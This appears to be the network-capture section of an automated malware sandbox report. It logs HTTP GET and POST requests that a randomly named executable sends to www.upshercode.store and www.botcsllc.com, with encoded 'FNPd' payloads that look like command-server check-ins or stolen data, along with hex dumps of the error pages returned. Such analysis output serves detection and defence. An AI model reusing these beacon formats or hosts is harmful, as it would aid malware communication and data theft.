                                  Data Ascii: FNPd=nhZ5J1hcIHrKY8XCg+USp/NqulndoIpfYTu4xSfh4mVCqf778Ez3Ko+V9smxV7F0TC1E8WZeU6dUAZA7wpo7YFsxIvbi+0FxynYK8cGp5iAocRYasySDvDnETwV6zRwuMG5FAd0pQChj940+iq/mH4QC8AB5GanXs/g6FUqexyPyGFsWa6uMsbKjt79rgVZ3iDMQhJXlmPjbptYOGuolH6yakkC39Wtlh4p39OxK6RZ/RzDGesq8O9Fs1YqSo5MDIc8POfxJh1UvdPgjb2haE0FTed68E3zlb3LqZCHSligpraBsdAy9Fps0IhbVBx7RlQxvgM1xC8bHfdDpcoN0z4RgCRZy1C8foQq+0o2eVhIlf5ikKrDs1eJx/gfOm7SqWZtsck7JVxG25SogIvgWg7JUEgHXJWQCbtwwErvtmHhzGApXHd9VHiLsu4Wre83f+KvcHit7MebQ+Bc/Alo2HbX64qyQPc+m2jQFqyMcR8IviQbqB0Z4Iu11b1iW/fLS1CdkptIp3CgCRqZv4HWAUh4pxl3hfAXtAZCgrlBdJs9TVD5FctgsuPGcLnQZfClsrSS3VdvjRyp9GYq3ZXIE73+SQD5vAB2ggkeuX2Ov4Mu0SU8IDz9HJXpAq8LxgAXPO06ZQ4EwzKt2kiNlUwIwj1FygeafuTHNzrFLkmJQpvIr9Gk2zl4pGgPSQB80mekQ7LO/5htOSBA06AcTKMrBXCB4T3iqjSkI4pNobHQ6X/yPsRD32CVJsg/5yA7wMFPdiI4KzBYe19mvzNcN6dHIiQQyVZD3XgMNssmcbI59Iqqs1F7AMczw21XQZfYIJl4d+2IIhQtLknBS2zEv/htz1BEQhWeX2krN7a40bOWJqWSTkA/GmNtUASGkPs1/geW/jEzuwOs2gEiNJFsSTX3MBnfA/2EdRbO4XtyEeTdC41tOlZJKTbp7cir0QKcEVHous5N/Gfwik9V2RrCgjNgHzNzgVNlHmt4SGFQ6Ysepzd4iW2b [TRUNCATED]
                                  May 23, 2024 15:19:11.487282991 CEST1236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.20.1
                                  Date: Thu, 23 May 2024 13:19:11 GMT
                                  Content-Type: text/html
                                  Content-Length: 3650
                                  Connection: close
                                  ETag: "636d2d22-e42"
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                                  May 23, 2024 15:19:11.488650084 CEST1236INData Raw: 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20
                                  Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color:
                                  May 23, 2024 15:19:11.492068052 CEST1236INData Raw: 3c 68 31 3e 3c 73 74 72 6f 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20
                                  Data Ascii: <h1><strong>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="
                                  May 23, 2024 15:19:11.492082119 CEST115INData Raw: 46 65 64 6f 72 61 20 5d 22 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 38 38 22 20 68 65 69 67 68 74 3d 22 33 31 22 20 2f 3e 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20
                                  Data Ascii: Fedora ]" width="88" height="31" /></a> </div> </div> </body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  4192.168.2.649709162.240.81.18803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:19:13.744543076 CEST495OUTGET /x98j/?FNPd=qjxZKFsELly6MM+AmuUyu+F9rQiXp5lDW0qCpVrbxnhhuort7QqFJtzXrMzOc4R6Q1I+kDBccd8ZIbwb2K8nQH4tZ93h2GRHyGwno8v69jYjSXEAvgOChTSVAihV0isdDVgpDYw=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1
                                  Host: www.upshercode.store
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  May 23, 2024 15:19:14.310803890 CEST1236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.20.1
                                  Date: Thu, 23 May 2024 13:19:14 GMT
                                  Content-Type: text/html
                                  Content-Length: 3650
                                  Connection: close
                                  ETag: "636d2d22-e42"
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                                  May 23, 2024 15:19:14.311640024 CEST1236INData Raw: 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20
                                  Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color:
                                  May 23, 2024 15:19:14.318681002 CEST1236INData Raw: 3c 68 31 3e 3c 73 74 72 6f 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20
                                  Data Ascii: <h1><strong>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="
                                  May 23, 2024 15:19:14.318696976 CEST115INData Raw: 46 65 64 6f 72 61 20 5d 22 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 38 38 22 20 68 65 69 67 68 74 3d 22 33 31 22 20 2f 3e 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20
                                  Data Ascii: Fedora ]" width="88" height="31" /></a> </div> </div> </body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  5192.168.2.649711216.40.34.41803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:19:19.632072926 CEST742OUTPOST /qukz/ HTTP/1.1
                                  Host: www.botcsllc.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 209
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.botcsllc.com
                                  Referer: http://www.botcsllc.com/qukz/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 37 68 55 61 76 4a 45 52 32 76 57 2b 71 68 51 76 42 6c 58 51 54 51 53 56 47 4c 6f 75 2b 7a 77 52 38 71 73 4b 37 77 31 35 30 4c 35 77 5a 72 39 77 63 2f 75 4a 2f 45 73 34 61 77 2b 31 4f 76 57 65 41 33 36 36 4f 49 64 70 7a 6d 37 6f 67 70 31 6e 71 42 32 6b 6f 70 6e 75 58 42 50 44 62 38 32 53 32 30 47 67 53 43 69 4a 6e 44 6a 33 70 36 6e 79 77 7a 62 33 4a 33 7a 66 76 36 2b 68 6f 39 44 31 4c 33 32 68 38 56 4f 5a 50 30 73 6e 30 33 6d 7a 61 49 49 41 4e 70 48 67 59 4d 37 76 48 72 6e 50 69 37 39 68 44 53 79 73 33 67 48 5a 49 37 54 49 57 56 30 48 4a 79 47 35 61 58 76 6a 52 51 4b 49 57 6b 5a 57 75 63 44 63 55 59 48 36
                                  Data Ascii: FNPd=7hUavJER2vW+qhQvBlXQTQSVGLou+zwR8qsK7w150L5wZr9wc/uJ/Es4aw+1OvWeA366OIdpzm7ogp1nqB2kopnuXBPDb82S20GgSCiJnDj3p6nywzb3J3zfv6+ho9D1L32h8VOZP0sn03mzaIIANpHgYM7vHrnPi79hDSys3gHZI7TIWV0HJyG5aXvjRQKIWkZWucDcUYH6
                                  May 23, 2024 15:19:20.166640043 CEST1236INHTTP/1.1 404 Not Found
                                  content-type: text/html; charset=UTF-8
                                  x-request-id: 102edd6b-9466-4f7e-8804-87a87faaa0c4
                                  x-runtime: 0.025563
                                  content-length: 18245
                                  connection: close
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                  May 23, 2024 15:19:20.167527914 CEST1236INData Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a
                                  Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
                                  May 23, 2024 15:19:20.172131062 CEST1236INData Raw: 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 68 65 61 64 20 74 72 2e 62 6f 74 74 6f 6d 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c
                                  Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
                                  May 23, 2024 15:19:20.176995039 CEST1236INData Raw: 0a 20 20 20 20 76 61 72 20 74 6f 67 67 6c 65 53 65 73 73 69 6f 6e 44 75 6d 70 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 6f 67 67 6c 65 28 27 73 65 73 73 69 6f 6e 5f 64 75 6d 70 27 29 3b 0a 20 20 20
                                  Data Ascii: var toggleSessionDump = function() { return toggle('session_dump'); } var toggleEnvDump = function() { return toggle('env_dump'); } </script></head><body><header> <h1>Routing Error</h1></header><div id="c
                                  May 23, 2024 15:19:20.177005053 CEST1236INData Raw: 69 6f 6e 5f 64 69 73 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 73 68 6f 77 5f 65 78 63 65 70 74 69 6f 6e 73 2e 72 62 3a 33 33 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65
                                  Data Ascii: ion_dispatch/middleware/show_exceptions.rb:33:in `call&#39;</a><br><a class="trace-frames" data-frame-id="2" href="#">lograge (0.11.2) lib/lograge/rails_ext/rack/logger.rb:15:in `call_app&#39;</a><br><a class="trace-frames" data-frame-id="3" h
                                  May 23, 2024 15:19:20.187411070 CEST1060INData Raw: 5f 69 64 2e 72 62 3a 32 37 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 31 22 20 68 72 65 66 3d 22 23 22
                                  Data Ascii: _id.rb:27:in `call&#39;</a><br><a class="trace-frames" data-frame-id="11" href="#">rack (2.2.3) lib/rack/method_override.rb:24:in `call&#39;</a><br><a class="trace-frames" data-frame-id="12" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `cal
                                  May 23, 2024 15:19:20.190502882 CEST1236INData Raw: 66 72 61 6d 65 2d 69 64 3d 22 31 39 22 20 68 72 65 66 3d 22 23 22 3e 70 75 6d 61 20 28 34 2e 33 2e 39 29 20 6c 69 62 2f 70 75 6d 61 2f 73 65 72 76 65 72 2e 72 62 3a 37 31 38 3a 69 6e 20 60 68 61 6e 64 6c 65 5f 72 65 71 75 65 73 74 26 23 33 39 3b
                                  Data Ascii: frame-id="19" href="#">puma (4.3.9) lib/puma/server.rb:718:in `handle_request&#39;</a><br><a class="trace-frames" data-frame-id="20" href="#">puma (4.3.9) lib/puma/server.rb:472:in `process_client&#39;</a><br><a class="trace-frames" data-frame
                                  May 23, 2024 15:19:20.190517902 CEST1236INData Raw: 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 35 22 20 68 72 65 66 3d 22 23 22 3e 61 63 74 69 76 65 73 75 70 70 6f 72 74 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f
                                  Data Ascii: ><br><a class="trace-frames" data-frame-id="5" href="#">activesupport (5.2.6) lib/active_support/tagged_logging.rb:28:in `tagged&#39;</a><br><a class="trace-frames" data-frame-id="6" href="#">activesupport (5.2.6) lib/active_support/tagged_log
                                  May 23, 2024 15:19:20.198250055 CEST1236INData Raw: 3e 61 63 74 69 6f 6e 70 61 63 6b 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61 63 74 69 6f 6e 5f 64 69 73 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 65 78 65 63 75 74 6f 72 2e 72 62 3a 31 34 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61
                                  Data Ascii: >actionpack (5.2.6) lib/action_dispatch/middleware/executor.rb:14:in `call&#39;</a><br><a class="trace-frames" data-frame-id="15" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/static.rb:127:in `call&#39;</a><br><a class="trace-fra
                                  May 23, 2024 15:19:20.198261023 CEST1236INData Raw: 6d 65 6e 74 42 79 49 64 28 27 66 72 61 6d 65 2d 73 6f 75 72 63 65 2d 30 27 29 3b 0a 0a 20 20 20 20 2f 2f 20 41 64 64 20 63 6c 69 63 6b 20 6c 69 73 74 65 6e 65 72 73 20 66 6f 72 20 61 6c 6c 20 73 74 61 63 6b 20 66 72 61 6d 65 73 0a 20 20 20 20 66
                                  Data Ascii: mentById('frame-source-0'); // Add click listeners for all stack frames for (var i = 0; i < traceFrames.length; i++) { traceFrames[i].addEventListener('click', function(e) { e.preventDefault(); var target = e.tar
                                  May 23, 2024 15:19:20.198292971 CEST848INData Raw: 3c 74 68 3e 0a 20 20 20 20 20 20 20 20 3c 61 20 64 61 74 61 2d 72 6f 75 74 65 2d 68 65 6c 70 65 72 3d 22 5f 70 61 74 68 22 20 74 69 74 6c 65 3d 22 52 65 74 75 72 6e 73 20 61 20 72 65 6c 61 74 69 76 65 20 70 61 74 68 20 28 77 69 74 68 6f 75 74 20
                                  Data Ascii: <th> <a data-route-helper="_path" title="Returns a relative path (without the http or domain)" href="#">Path</a> / <a data-route-helper="_url" title="Returns an absolute URL (with the http and domain)" href="#">Url</a> </


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  6192.168.2.649712216.40.34.41803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:19:22.165946007 CEST766OUTPOST /qukz/ HTTP/1.1
                                  Host: www.botcsllc.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 233
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.botcsllc.com
                                  Referer: http://www.botcsllc.com/qukz/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 37 68 55 61 76 4a 45 52 32 76 57 2b 72 42 41 76 53 79 72 51 52 77 53 57 4a 72 6f 75 30 54 77 4e 38 71 51 4b 37 79 5a 51 30 64 70 77 5a 4a 6c 77 4f 72 61 4a 36 45 73 34 53 51 2b 77 57 50 58 51 41 32 48 48 4f 4b 5a 70 7a 69 54 6f 67 6f 46 6e 71 79 65 6a 6f 35 6d 49 61 68 50 42 56 63 32 53 32 30 47 67 53 43 65 6a 6e 48 48 33 70 4b 33 79 78 53 62 30 58 6e 7a 41 2f 71 2b 68 2f 74 44 78 4c 33 32 58 38 51 71 7a 50 79 6f 6e 30 7a 69 7a 62 5a 49 44 45 70 48 63 63 4d 36 2b 42 59 65 43 75 34 4d 35 4d 68 69 66 6a 58 50 67 4e 4e 53 53 4b 6d 30 6b 62 69 6d 37 61 56 33 52 52 77 4b 69 55 6b 68 57 38 4c 50 37 62 73 69 5a 55 74 33 4b 35 5a 4f 75 51 50 34 33 47 2f 78 78 62 73 51 45 79 77 3d 3d
                                  Data Ascii: FNPd=7hUavJER2vW+rBAvSyrQRwSWJrou0TwN8qQK7yZQ0dpwZJlwOraJ6Es4SQ+wWPXQA2HHOKZpziTogoFnqyejo5mIahPBVc2S20GgSCejnHH3pK3yxSb0XnzA/q+h/tDxL32X8QqzPyon0zizbZIDEpHccM6+BYeCu4M5MhifjXPgNNSSKm0kbim7aV3RRwKiUkhW8LP7bsiZUt3K5ZOuQP43G/xxbsQEyw==
                                  May 23, 2024 15:19:22.705976963 CEST1236INHTTP/1.1 404 Not Found
                                  content-type: text/html; charset=UTF-8
                                  x-request-id: cb9f6b69-dc63-4e2d-be7d-c6acb065fe0a
                                  x-runtime: 0.051811
                                  content-length: 18269
                                  connection: close
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                  May 23, 2024 15:19:22.706659079 CEST1236INData Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a
                                  Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
                                  May 23, 2024 15:19:22.708333969 CEST448INData Raw: 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 68 65 61 64 20 74 72 2e 62 6f 74 74 6f 6d 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c
                                  Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
